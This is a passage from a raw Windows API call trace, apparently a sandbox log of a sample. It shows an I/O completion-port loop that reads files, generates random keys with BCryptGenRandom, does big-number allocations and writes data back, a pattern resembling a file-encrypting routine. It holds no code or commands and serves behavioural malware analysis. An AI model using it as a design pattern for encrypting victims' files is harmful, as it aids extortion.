lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0200.855] CloseHandle (hObject=0x170) returned 1 [0200.855] free (_Block=0x3df0008) [0200.855] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0200.861] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x213c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0200.870] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0200.980] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0200.980] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0200.993] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0200.993] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.008] CloseHandle (hObject=0x338) returned 1 [0201.008] free (_Block=0x3d70450) [0201.008] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.011] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0xd10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0201.011] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.011] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x7c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0201.011] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.029] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xdec, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0201.029] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.030] CloseHandle (hObject=0x308) returned 1 [0201.030] free (_Block=0x1ff1e60) [0201.030] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.095] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.096] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.096] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0201.096] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.096] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.096] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0201.096] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0201.096] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0201.097] free (_Block=0x3e305b8) [0201.097] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0201.097] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0201.097] free (_Block=0x1fa91d0) [0201.097] free (_Block=0x1fa2ed8) [0201.097] free (_Block=0x1fa90b8) [0201.097] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0201.097] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.098] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x890, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0201.098] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.117] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x7e4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0201.118] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.118] CloseHandle (hObject=0x2a8) returned 1 [0201.118] free (_Block=0x1ff1e60) [0201.118] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.131] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.131] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0201.131] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.132] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0201.132] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0201.132] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0201.132] free (_Block=0x3e305b8) [0201.132] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0201.132] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0201.132] free (_Block=0x1fa91d0) [0201.132] free (_Block=0x1fa2ed8) [0201.132] free (_Block=0x1fa90b8) [0201.133] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0201.133] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.133] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x730, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0201.133] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.160] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x67c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0201.161] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.173] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x66c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0201.173] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.245] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0201.245] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.246] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0201.246] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.263] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x6d4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0201.264] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.264] CloseHandle (hObject=0x2a8) returned 1 [0201.264] free (_Block=0x3d70450) [0201.264] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.274] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.275] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.275] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0201.275] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.275] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.275] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0201.276] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0201.276] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0201.276] free (_Block=0x3e305b8) [0201.276] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0201.276] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0201.276] free (_Block=0x1fa91d0) [0201.276] free (_Block=0x1fa2ed8) [0201.276] free (_Block=0x1fa90b8) [0201.276] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0201.277] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.277] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0201.277] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.292] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x634, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0201.292] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.293] CloseHandle (hObject=0x2a8) returned 1 [0201.293] free (_Block=0x3df0008) [0201.293] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.785] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.786] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0201.786] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.786] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0201.787] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0201.787] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0201.787] free (_Block=0x3e305b8) [0201.787] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0201.787] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0201.787] free (_Block=0x1fa91d0) [0201.787] free (_Block=0x1fa2ed8) [0201.787] free (_Block=0x1fa90b8) [0201.787] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0201.787] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.822] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x93d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0201.822] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.823] CloseHandle (hObject=0x2a8) returned 1 [0201.825] free (_Block=0x3df0008) [0201.825] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.889] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.903] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0201.903] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.903] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0201.903] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0201.903] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0201.904] free (_Block=0x3e305b8) [0201.904] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0201.904] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0201.904] free (_Block=0x1fa91d0) [0201.904] free (_Block=0x1fa2ed8) [0201.904] free (_Block=0x1fa90b8) [0201.904] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0201.905] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.905] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xad0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0201.905] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.923] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x822, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0201.923] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.923] CloseHandle (hObject=0x2a8) returned 1 [0201.923] free (_Block=0x3df0008) [0201.924] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.940] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.941] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0201.941] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.942] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0201.942] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0201.942] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0201.942] free (_Block=0x3e305b8) [0201.942] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0201.942] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0201.943] free (_Block=0x1fa91d0) [0201.943] free (_Block=0x1fa2ed8) [0201.943] free (_Block=0x1fa90b8) [0201.943] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0201.943] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.943] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0201.944] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.960] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x6ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0201.961] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0201.961] CloseHandle (hObject=0x2a8) returned 1 [0201.961] free (_Block=0x3df0008) [0201.961] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.019] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.020] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0202.020] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.020] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0202.020] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0202.020] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0202.020] free (_Block=0x3e305b8) [0202.021] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0202.021] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0202.021] free (_Block=0x1fa91d0) [0202.021] free (_Block=0x1fa2ed8) [0202.021] free (_Block=0x1fa90b8) [0202.021] WriteFile (in: hFile=0x2a8, 